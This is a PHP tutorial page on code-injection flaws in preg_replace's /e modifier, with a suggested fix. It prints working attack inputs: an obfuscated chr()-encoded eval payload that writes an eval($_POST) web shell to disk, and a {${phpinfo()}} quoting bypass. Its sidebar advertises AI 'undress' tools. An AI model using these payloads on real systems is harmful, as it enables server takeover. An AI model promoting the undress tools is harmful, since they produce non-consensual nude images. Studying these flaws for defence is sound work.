Backend Development
PHP Tutorial
Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial
Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial
preg_replace function prototype:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
Special instructions:
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreference replacement). Tip: Make sure that replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace().
Example:
preg_replace (" /(]*>)/e",
"1.strtoupper(2).3",
$html_body);
?> ;
This will make all HTML tags in the input string uppercase.
Security threat analysis:
Usually the subject parameter is generated by the client, and the client may construct malicious code, for example:
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>
If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP code implement).
What happens if we submit the following code?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr( 112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47) .chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39) .chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr (101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr (84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39 ).chr(41).chr(59))
The plaintext corresponding to the ciphertext is: fputs(fopen(data/a.php,w), );
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.
Another difficult example:
< ?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test(" 1")', $_GET["h"]);
?>
Submit?h=[php]phpinfo()[/php], phpinfo() Will it be enforced?
Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time.
Is there any way to make it execute?
Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.
Note: Functions enclosed in double quotes will not be executed and replaced.
Here we need to construct a special variable through {${}}, 'test("{${phpinfo()}}")', to achieve the effect of having the function executed (${ phpinfo()} will be interpreted and executed).
You can do the following test first:
echo "{${phpinfo ()}}";
phpinfo will be executed successfully.
How to prevent this vulnerability?
Change 'test("1")' to "test('1')" so that '${phpinfo()}' will be treated as an ordinary string (variables in single quotes will not be processed).
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1359
52
Tips for dynamically creating new functions in golang functions
Apr 25, 2024 pm 02:39 PM
Go language provides two dynamic function creation technologies: closure and reflection. closures allow access to variables within the closure scope, and reflection can create new functions using the FuncOf function. These technologies are useful in customizing HTTP routers, implementing highly customizable systems, and building pluggable components.
Considerations for parameter order in C++ function naming
Apr 24, 2024 pm 04:21 PM
In C++ function naming, it is crucial to consider parameter order to improve readability, reduce errors, and facilitate refactoring. Common parameter order conventions include: action-object, object-action, semantic meaning, and standard library compliance. The optimal order depends on the purpose of the function, parameter types, potential confusion, and language conventions.
How to write efficient and maintainable functions in Java?
Apr 24, 2024 am 11:33 AM
The key to writing efficient and maintainable Java functions is: keep it simple. Use meaningful naming. Handle special situations. Use appropriate visibility.
Complete collection of excel function formulas
May 07, 2024 pm 12:04 PM
1. The SUM function is used to sum the numbers in a column or a group of cells, for example: =SUM(A1:J10). 2. The AVERAGE function is used to calculate the average of the numbers in a column or a group of cells, for example: =AVERAGE(A1:A10). 3. COUNT function, used to count the number of numbers or text in a column or a group of cells, for example: =COUNT(A1:A10) 4. IF function, used to make logical judgments based on specified conditions and return the corresponding result.
Comparison of the advantages and disadvantages of C++ function default parameters and variable parameters
Apr 21, 2024 am 10:21 AM
The advantages of default parameters in C++ functions include simplifying calls, enhancing readability, and avoiding errors. The disadvantages are limited flexibility and naming restrictions. Advantages of variadic parameters include unlimited flexibility and dynamic binding. Disadvantages include greater complexity, implicit type conversions, and difficulty in debugging.
What are the benefits of C++ functions returning reference types?
Apr 20, 2024 pm 09:12 PM
The benefits of functions returning reference types in C++ include: Performance improvements: Passing by reference avoids object copying, thus saving memory and time. Direct modification: The caller can directly modify the returned reference object without reassigning it. Code simplicity: Passing by reference simplifies the code and requires no additional assignment operations.
What is the difference between custom PHP functions and predefined functions?
Apr 22, 2024 pm 02:21 PM
The difference between custom PHP functions and predefined functions is: Scope: Custom functions are limited to the scope of their definition, while predefined functions are accessible throughout the script. How to define: Custom functions are defined using the function keyword, while predefined functions are defined by the PHP kernel. Parameter passing: Custom functions receive parameters, while predefined functions may not require parameters. Extensibility: Custom functions can be created as needed, while predefined functions are built-in and cannot be modified.
C++ Function Exception Advanced: Customized Error Handling
May 01, 2024 pm 06:39 PM
Exception handling in C++ can be enhanced through custom exception classes that provide specific error messages, contextual information, and perform custom actions based on the error type. Define an exception class inherited from std::exception to provide specific error information. Use the throw keyword to throw a custom exception. Use dynamic_cast in a try-catch block to convert the caught exception to a custom exception type. In the actual case, the open_file function throws a FileNotFoundException exception. Catching and handling the exception can provide a more specific error message.
